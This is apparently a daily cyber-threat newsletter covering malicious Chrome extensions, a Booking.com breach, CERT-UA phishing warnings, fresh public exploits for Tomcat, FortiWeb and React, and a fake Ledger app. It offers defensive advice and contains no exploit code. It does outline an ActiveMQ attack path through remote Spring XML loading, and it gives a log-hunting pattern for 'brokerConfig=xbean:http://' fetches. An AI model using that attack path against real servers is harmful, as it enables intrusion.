The Lyceum: Cyber Intelligence Daily — Apr 15, 2026

One hundred eight browser extensions have been stealing Google account tokens from the official Chrome Web Store for up to four years — and as of this morning, they're still there. Booking.com confirmed a reservation-data breach, amid a wave of phishing so convincing it knows your hotel name and check-in date. CERT-UA posted an afternoon warning that Russian-linked attackers are intensifying campaigns against Ukrainian hospitals using fake humanitarian-aid emails. And underneath all of it, a pattern: fresh public exploit code for a Fortinet WAF, a CVSS-10.0 React flaw, and an Apache Tomcat RCE all surfaced within hours of each other, compressing the gap between "disclosed" and "weaponized" to nearly zero.

• CVE-2026-21643 — Fortinet FortiClient EMS: actively exploited; CISA KEV remediation deadline for federal civilian agencies is tomorrow (April 16). CVSS not yet scored in NVD; operational maturity confirmed. Patch now or document why you haven't.
• CVE-2026-32201 — Microsoft SharePoint Server: added to CISA KEV; actively exploited. Operational maturity. Remediation deadline for federal civilian agencies is April 28.
• CVE-2023-21529 — Microsoft Exchange Server: added to CISA KEV; actively exploited. Storm-1175 attributed. Operational maturity. Remediation deadline for federal civilian agencies is April 27.
• CVE-2025-24813 PoC — Apache Tomcat RCE: automated proof-of-concept exploit published to GitHub within the last 24 hours, with a reported 99.4% success rate in testing. Not yet in mass-exploitation toolkits, but the barrier to entry just dropped to "download and run."
• FortiWeb 8.0.2 RCE PoC — Fortinet FortiWeb WAF: raw exploit code uploaded to Exploit-DB today. No public CVE or vendor patch confirmed yet. Perimeter appliance — treat as urgent.
• React2Shell fresh Exploit-DB entry — React Server 19.2.0 RCE (CVE-2025-55182, CVSS 10.0, KEV, ransomware-linked): new public exploit indexed today. Google GTIG has documented China-nexus exploitation since December. Over 968,000 exposed instances per Palo Alto Networks.
• CVE-2026-33579 — OpenClaw AI agent platform: privilege escalation, VulnCheck CVSS 9.9. Fixed in version 2026.3.28. NVD record enriched; no longer just GitHub chatter.

If you've installed a Telegram sidebar, a slot-machine game, or a YouTube enhancer from the Chrome Web Store recently, there's a real chance it's been quietly looting your accounts in the background.

Application security firm Socket discovered 108 malicious extensions — still live in the official Chrome Web Store as of this morning — that steal Google OAuth2 Bearer tokens, deploy backdoors, and run ad fraud, all sharing the same command-and-control infrastructure. An OAuth2 Bearer token is essentially a master key: whoever holds it can access your Google account without needing your password or two-factor code. According to BleepingComputer, Socket found code comments pointing to a Russian malware-as-a-service operation, and CyberNews reports the shared C2 domain, cloudapi[.]stream, was registered in April 2022 — consistent with a campaign that may have been active for roughly four years before discovery.

The extensions fall into five categories — Telegram sidebar clients, slot machines, YouTube/TikTok enhancers, translation tools, and browser utilities — and all work as advertised on the surface. The most severe, "Telegram Multi-account," exfiltrates the victim's active Telegram Web session every 15 seconds, according to CyberNews. Forty-five of the extensions contain a universal backdoor that opens arbitrary URLs on browser start, meaning the attacker can push new commands to any infected browser without user interaction. Socket estimates roughly 20,000 total installs across the set.

What changes if Google doesn't act fast: every day these extensions remain live demonstrates that a single actor can defeat the Web Store's review process at scale for years. That's an invitation for copycats. If the extensions are still available by end of day April 16, the Web Store's automated review has a structural gap that other operators will exploit.

What to do now: Socket published the full list of malicious extension IDs. Remove any matches immediately. If you used the Telegram extension, terminate all other Telegram Web sessions from your mobile app (Settings → Devices). If you signed into any of these extensions with Google, review third-party app access at myaccount.google.com/permissions and revoke unfamiliar entries.

If you have an upcoming trip booked through Booking.com, you're about to receive some very convincing messages from people who are not your hotel.

Booking.com confirmed to BleepingComputer that hackers accessed customer data tied to reservations — names, email addresses, phone numbers, and booking details. The company forced PIN resets and notified affected users directly. TechCrunch corroborated the confirmation. Financial data was not taken, according to the company. Booking.com has over 100 million active mobile app users and more than 500 million monthly website visits, per CyberNews, so even a partial breach creates an enormous phishing surface.

The real danger is temporal. As SOSRansomware's analysis noted, travel booking data is uniquely weaponizable because of its time dimension: as a departure date approaches, the fear of a cancelled reservation pushes travelers to react before thinking. Scammers concentrate phishing attempts in the days before a trip — the precise moment when vigilance gives way to haste. Help Net Security reports that Dubai-based cybersecurity firm Hackmanac says the Vect hacking group claimed breaches at both Booking.com and Airbnb, though neither claim is confirmed. Russian outlet Xakep.ru reported early samples and claims that partial reservation records surfaced on dark-web forums, a detail still being verified against Booking.com's statement that full financial data weren't accessed.

What failure looks like: if Booking.com doesn't disclose the breach scope and attack vector within the next week, defenders are flying blind — and the phishing wave will outrun the company's damage control. The observable signal is whether leaked reservation samples appear on marketplaces. If they do, every travel platform becomes a target.

Practical steps: Treat any payment request arriving by email, WhatsApp, or SMS about a Booking.com reservation as fraudulent. The company says it never requests bank details through those channels. Add travel-themed indicators to your phishing filters now.

Ukraine's national cybersecurity agency posted a warning today that should matter to anyone tracking how Russia targets civilian infrastructure — and to any organization that receives emails about humanitarian aid.

CERT-UA's official Telegram channel posted at 14:13 UTC today — hours before a formal advisory — that attacks on local self-government bodies and especially healthcare facilities have increased sharply during March and April 2026. The advisory, tracking threat cluster UAC-0247, documents a specific playbook: attackers email targets under the guise of discussing humanitarian aid proposals, direct victims to download an archive, and install malware. The Telegram alert preceded the formal advisory by several hours, consistent with CERT-UA's pattern of using the channel as an early-warning mechanism.

What's new isn't the tactic — Russia-linked actors have exploited wartime aid urgency before — but the escalation in scope. The advisory explicitly names healthcare facilities and FPV-drone operators as targets, meaning adversaries are gathering tactical intelligence on frontline drone deployments and medical logistics — information with direct battlefield value. UAC-0247 is the fourth new Ukrainian threat cluster designation in the past week (joining UAC-0239, UAC-0241, and UAC-0245), a pace that signals either a genuine increase in Russian cyber operations tempo or a deliberate CERT-UA effort to publicly attribute campaigns previously tracked internally.

No ransomware detonations have been observed in UAC-0247's activity — current payloads focus on espionage and access. The signal to watch: whether UAC-0247 TTPs appear outside Ukraine. CERT-UA advisories on Russian campaigns have historically preceded similar operations against EU member states by weeks.

Actionable now: Brief email-filtering teams to flag aid-themed lures. Block archive downloads from unknown senders. Treat unsolicited "humanitarian coordination" emails with heightened skepticism.

If your organization runs Java applications, the window to patch quietly just closed.

A fully automated proof-of-concept exploit for CVE-2025-24813, a critical remote code execution vulnerability in Apache Tomcat, appeared on GitHub within the last 24 hours. The Python script reportedly achieves a 99.4% success rate in testing, effectively lowering the barrier from "sophisticated attacker" to "anyone who can run a script." Apache Tomcat is one of the most widely deployed Java web servers in the world — it powers everything from internal business applications to customer-facing portals.

This matters because of what typically happens next. The lifecycle is predictable: PoC published → integrated into scanning tools within days → picked up by initial access brokers within a week → ransomware operators buying that access within two weeks. We're at step one. The observable signal that this has escalated is mass-scanning activity on Tomcat management ports — if GreyNoise or Shadowserver report a spike, the clock has moved from "patch prudently" to "patch now or explain the incident."

Separately, Xakep.ru reported today that Apache patched CVE-2026-34197 in Apache ActiveMQ Classic — an RCE flaw that sat unnoticed for 13 years, exploitable via the Jolokia management interface to load remote Spring XML files and execute system commands. Horizon3 researchers, cited by Xakep.ru, say they haven't seen real-world exploitation yet. If you run ActiveMQ Classic, patch to versions 5.19.4 or 6.2.3 and hunt for unexpected brokerConfig=xbean:http:// fetches in your logs.

Xakep.ru reported today that attackers bypassed Apple's app review process with a polished counterfeit of Ledger Live — the legitimate companion app for Ledger hardware cryptocurrency wallets. Users who downloaded the fake and entered their recovery phrases handed total control of their hardware wallets to the attackers, resulting in $9.5 million stolen before Apple removed the application. Xakep's account notes the fake app used fabricated positive reviews and a convincing UI, and that exfiltration occurred gradually over days to weeks rather than in a single transaction. The vector — Apple's curated App Store, not a sideloaded download — undercuts the assumption that walled gardens are immune to supply-chain impersonation.

Source: Xakep.ru — Russian. No English-language coverage confirmed at time of publication.

Xakep.ru, citing Horizon3 research, reported that CVE-2026-34197 (CVSS 8.8) affects Apache ActiveMQ Classic before 5.19.4 and versions 6.0.0 through 6.2.3. The flaw allows remote code execution via the Jolokia management interface by loading a remote Spring XML file during broker initialization. In versions 6.0.0 through 6.1.1, a separate flaw (CVE-2024-32114) removes the authentication barrier entirely. Apache released fixes on March 30. Horizon3 says no real-world exploitation has been observed yet, but the 13-year dwell time in the codebase makes this a reminder that old software has a very long memory.

Source: Xakep.ru — Russian. No English-language coverage confirmed at time of publication.

Xakep.ru published a detailed technical analysis of a recent use-after-free vulnerability in Chrome's rendering engine — the class of memory-corruption bug that has historically been the most common vector for Chrome zero-day exploitation. The article walks through the exploit mechanics, heap manipulation techniques, and how Chrome's memory-safety mitigations interact with this specific flaw class. While not tied to a named active campaign, the analysis provides defenders and red-teamers with concrete indicators of what exploitation of this bug class looks like in practice.

Source: Xakep.ru — Russian. No English-language coverage confirmed at time of publication.

One hundred eight browser extensions stealing your Google tokens for four years while Google's review bots napped; a travel platform's reservation data turning every upcoming hotel stay into a personalized phishing lure; and a 13-year-old Apache bug finally getting patched, presumably after finishing middle school.

The fake Ledger app made $9.5 million through Apple's walled garden — turns out the wall has a gift shop.

Eyes open. Patches applied. Extensions audited.

If someone you know runs Chrome extensions, Tomcat servers, or upcoming travel reservations — so, everyone — forward this their way.